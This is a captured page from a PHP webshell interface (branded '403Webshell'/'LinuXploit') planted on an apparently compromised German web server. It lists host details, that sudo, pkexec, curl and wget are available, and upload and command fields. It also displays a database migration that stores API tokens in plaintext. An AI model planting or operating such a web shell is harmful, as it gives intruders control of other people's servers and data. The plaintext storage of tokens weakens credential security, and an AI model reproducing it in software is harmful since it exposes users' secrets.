403Webshell
Server IP : 202.61.199.114  /  Your IP : 216.73.217.139
Web Server : nginx/1.22.1
System : Linux de.arni-solutions.de 6.1.0-49-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
User : web20 ( 1018)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/seaside2.pacim.de/web/database/migrations/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/seaside2.pacim.de/web/database/migrations/035_api_tokens_plain.sql
-- 035: API-Token Klartext zusätzlich speichern.
--
-- Anforderung: Der Zugangstoken muss in den API-Einstellungen für jeden angelegten
-- Eintrag dauerhaft abrufbar sein (nicht nur einmalig beim Anlegen). Wir speichern
-- den Klartext deshalb zusätzlich zum Hash. Der Hash bleibt der Auth-Index (UNIQUE),
-- damit Lookups bei API-Aufrufen schnell bleiben.
--
-- Sicherheits-Trade-off: Wer Zugriff auf die Datenbank hat, kann Tokens auslesen.
-- Bestehende Tokens behalten ihren NULL-Wert (Klartext nicht mehr rekonstruierbar) —
-- sie funktionieren trotzdem weiter, müssen aber bei Bedarf neu erzeugt werden.

ALTER TABLE `api_tokens`
    ADD COLUMN `token_plain` VARCHAR(128) DEFAULT NULL AFTER `token_hash`;

Youez - 2016 - github.com/yon3zu
LinuXploit